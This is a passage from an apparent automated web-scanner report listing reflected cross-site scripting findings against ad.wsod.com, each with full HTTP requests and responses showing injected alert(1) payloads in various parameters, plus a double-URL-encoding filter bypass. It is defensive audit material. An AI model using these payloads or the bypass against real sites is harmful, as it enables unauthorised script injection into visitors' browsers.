GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x3034c2a%2522%253balert%25281%2529%252f%252f53353438aff/1394606125?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=1394606125&PG=INVSRQ&ASID=0932f0fa7bd044ce92444252d58da2c8 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 01:43:17 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x3034c2a";alert(1)//53353438aff/1296351797**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=1394606125&PG=INVSRQ&ASID=0932f0fa7bd044ce924
...[SNIP]...

5.131. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125 [TargetID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fa01b"-alert(1)-"1b5b12782c4 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488fa01b"-alert(1)-"1b5b12782c4&AN=1394606125&PG=INVSRQ&ASID=0932f0fa7bd044ce92444252d58da2c8 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 01:40:35 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296351635**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488fa01b"-alert(1)-"1b5b12782c4&AN=1394606125&PG=INVSRQ&ASID=0932f0fa7bd044ce92444252d58da2c8">
...[SNIP]...

5.132. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125 [UIT parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125

Issue detail

The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8921f"-alert(1)-"0ff0bbaf9e4 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G8921f"-alert(1)-"0ff0bbaf9e4&TargetID=28253488&AN=1394606125&PG=INVSRQ&ASID=0932f0fa7bd044ce92444252d58da2c8 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 01:40:22 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
/ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296351622**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G8921f"-alert(1)-"0ff0bbaf9e4&TargetID=28253488&AN=1394606125&PG=INVSRQ&ASID=0932f0fa7bd044ce92444252d58da2c8">
...[SNIP]...

5.133. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125 [click parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dcba9"-alert(1)-"1c04fc64770 was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125?click=http://g.redacted/_2AD0003L/93000000000038010.1?!dcba9"-alert(1)-"1c04fc64770&&PID=8010639&UIT=G&TargetID=28253488&AN=1394606125&PG=INVSRQ&ASID=0932f0fa7bd044ce92444252d58da2c8 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 01:40:00 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
rc="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296351600**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.redacted/_2AD0003L/93000000000038010.1?!dcba9"-alert(1)-"1c04fc64770&&PID=8010639&UIT=G&TargetID=28253488&AN=1394606125&PG=INVSRQ&ASID=0932f0fa7bd044ce92444252d58da2c8">
...[SNIP]...

5.134. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6bede"-alert(1)-"9ed5f8f0fb1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=1394606125&PG=INVSRQ&ASID=0932f0fa7bd044ce92444252d58da2c8&6bede"-alert(1)-"9ed5f8f0fb1=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 01:42:33 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1684

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=1394606125&PG=INVSRQ&ASID=0932f0fa7bd044ce92444252d58da2c8&6bede"-alert(1)-"9ed5f8f0fb1=1">
...[SNIP]...

5.135. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894 [&PID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894

Issue detail

The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b9a1e"-alert(1)-"0aefbd57b48 was submitted in the &PID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639b9a1e"-alert(1)-"0aefbd57b48&UIT=G&TargetID=28253488&AN=842662894&PG=INVSRQ&ASID=a06ba72a17b94ee896a6f183bcdee2f9 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_1=33:353:516:3:0:38345:1296350886:L|33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L; u=4d2cdd9abba1d; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:49:18 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1680

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
oto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296398958**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639b9a1e"-alert(1)-"0aefbd57b48&UIT=G&TargetID=28253488&AN=842662894&PG=INVSRQ&ASID=a06ba72a17b94ee896a6f183bcdee2f9">
...[SNIP]...

5.136. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894 [AN parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894

Issue detail

The value of the AN request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 685ba"-alert(1)-"3346fc71ccf was submitted in the AN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=842662894685ba"-alert(1)-"3346fc71ccf&PG=INVSRQ&ASID=a06ba72a17b94ee896a6f183bcdee2f9 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_1=33:353:516:3:0:38345:1296350886:L|33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L; u=4d2cdd9abba1d; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:50:14 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1680

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
5d7fd7c0fb6e6a631357/353.0.js.120x30/1296399014**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=842662894685ba"-alert(1)-"3346fc71ccf&PG=INVSRQ&ASID=a06ba72a17b94ee896a6f183bcdee2f9">
...[SNIP]...

5.137. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894 [ASID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894

Issue detail

The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c84f4"-alert(1)-"735b0bb387b was submitted in the ASID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=842662894&PG=INVSRQ&ASID=a06ba72a17b94ee896a6f183bcdee2f9c84f4"-alert(1)-"735b0bb387b HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_1=33:353:516:3:0:38345:1296350886:L|33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L; u=4d2cdd9abba1d; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:50:32 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1680

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
*;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=842662894&PG=INVSRQ&ASID=a06ba72a17b94ee896a6f183bcdee2f9c84f4"-alert(1)-"735b0bb387b">
...[SNIP]...

5.138. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894 [PG parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894

Issue detail

The value of the PG request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa884"-alert(1)-"d97069342a2 was submitted in the PG parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=842662894&PG=INVSRQaa884"-alert(1)-"d97069342a2&ASID=a06ba72a17b94ee896a6f183bcdee2f9 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_1=33:353:516:3:0:38345:1296350886:L|33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L; u=4d2cdd9abba1d; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:50:23 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1680

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
6e6a631357/353.0.js.120x30/1296399023**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=842662894&PG=INVSRQaa884"-alert(1)-"d97069342a2&ASID=a06ba72a17b94ee896a6f183bcdee2f9">
...[SNIP]...

5.139. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d21a1%2522%253balert%25281%2529%252f%252ff11855debe8 was submitted in the REST URL parameter 2. This input was echoed as d21a1";alert(1)//f11855debe8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357d21a1%2522%253balert%25281%2529%252f%252ff11855debe8/353.0.js.120x30/842662894?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=842662894&PG=INVSRQ&ASID=a06ba72a17b94ee896a6f183bcdee2f9 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_1=33:353:516:3:0:38345:1296350886:L|33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L; u=4d2cdd9abba1d; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:51:20 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1680

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357d21a1";alert(1)//f11855debe8/353.0.js.120x30/1296399080**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=842662894&PG=INVSRQ&ASID=a06b
...[SNIP]...

5.140. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4ebba%2522%253balert%25281%2529%252f%252fc747ad1690c was submitted in the REST URL parameter 3. This input was echoed as 4ebba";alert(1)//c747ad1690c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x304ebba%2522%253balert%25281%2529%252f%252fc747ad1690c/842662894?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=842662894&PG=INVSRQ&ASID=a06ba72a17b94ee896a6f183bcdee2f9 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_1=33:353:516:3:0:38345:1296350886:L|33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L; u=4d2cdd9abba1d; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:51:25 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1680

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x304ebba";alert(1)//c747ad1690c/1296399085**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=842662894&PG=INVSRQ&ASID=a06ba72a17b94ee896a6
...[SNIP]...

5.141. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894 [TargetID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa04f"-alert(1)-"69f6ed3ba42 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

